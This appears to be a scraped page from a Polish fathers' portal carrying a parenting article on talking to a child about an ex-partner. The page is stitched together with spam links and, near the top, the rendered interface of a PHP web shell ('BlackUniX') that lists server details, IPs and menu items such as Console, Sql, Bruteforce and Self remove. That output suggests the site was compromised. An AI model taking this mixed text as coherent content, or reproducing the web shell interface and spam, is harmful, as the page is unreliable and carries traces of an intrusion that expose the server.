W Stronę Ojca i no co ty Tato

Polecamy

Leczenie u usuwanie żylaków (żylaki wrocław).

Tamte licea dla dorosłych warszawa były bardzo popularne.

BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-21 07:59:35
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.80.7.173
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Jak rozmawiać z dzieckiem o swojej byłej?
25.09.2008.
Każdy ma prawo decydować o tym jak wygląda jego życie, z kim chce spędzać czas, jak się zachowuje – tyle teorii, co, do której każdy „teoretycznie się zgodzi. Problem się zaczyna, gdy „temat“ dotyczy naszej byłej żony czy partnerki. Nagle przestajemy Już być tacy tolerancyjni, otwarci – z jednej strony rozumiemy, że każdy decyduje o sobie z drugiej, jeżeli jesteśmy rodzicami to sytuacja ulega dużej zmianie. Rodzicielstwo uczy pokory, rodzicielstwo z doskoku, jakim jest bycie „weekendowy“ ojcem wymaga od nas jeszcze więcej.
Jak rozmawiać z dzieckiem o naszej byłej? Po pierwsze nie jest to łatwy temat, obarczony na prawdę dużą dawką emocji, – bo czyż nie planowaliśmy cudownego wspólnego życia? Czy nie chcieliśmy być częścią kochającej się rodziny? A tutaj nic z tego zupełnie nie wyszło. Jeżeli zdajemy sobie sprawę z tego jak trudny jest to temat to teraz warto się zastanowić, jaki obraz chcemy „malować“ dla dziecka? Oczywiście najłatwiej nam samym byłoby powiedzieć dziecku, jaką straszną krzywdę robi mu jej/jego matka nie pozwalając nam na normalne kontakty. Tylko, do czego doprowadzi taka rozmowa? Do kolejnej kłótni? Do kolejnych napięć? Po co! Zarówno my jak i dziecko i tak znajdujemy się już w dość trudnej sytuacji poco ją jeszcze zmieniać na gorsze.
Omijanie tematu- traktowanie byłej żony czy partnerki jak powietrze też nie jest najlepszym pomysłem – przecież i tak prędzej czy później będziemy musieli się z tym tematem zmierzyć.
Zatem co robić? Nie warto kłamać ani ukrywać przed dzieckiem naszych emocji, dotyczy to równieź emocji negatywnych. Nie możemy w żadnym wypadku obarczać dziecko poczuciem winy za to, że nasz związek się rozpadł, nie możemy wpędzać dziecka w pułapkę – „to kogo kochasz bardziej mamusie czy tatusia“.
To co jest najlepszym rozwiązaniem to powiedzeniem wprost dziecku (niezależnie od wieku), że rodzice już więcej ze sobą nie będą mieszkać bo nie chcą się kłócić itp wraz z zapewnieniem o tym jak kochamy nasze maleństwo (nawet gdy „nasze maleństwo“ jest już o głowę wyższe od nas).
To co powinno być najważniejsze w naszej rozmowie to szczerość dotycząca naszych uczuć do dziecka, to co czujemy do naszej byłej partnerki powinno być przedstawione dziecku z dystansem. W żadnym wypadku nie wikłajmy dziecka w nasze problemy I kłótnie – wystarczy, że sytuacja w której wszyscy się znajdujemy jest i tak wyjątkowo dla wszystkich trudna.
Jak rozmawiać? Szczerze, bez rozdrapywania ran, nie omijać I unikać tematu jednocześnie pokazując dziecku, że myślimy o przyszłości.
Dota Szymborska
Redkator naczelana portalu www.wczesnaedukacja.com
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.07.2018.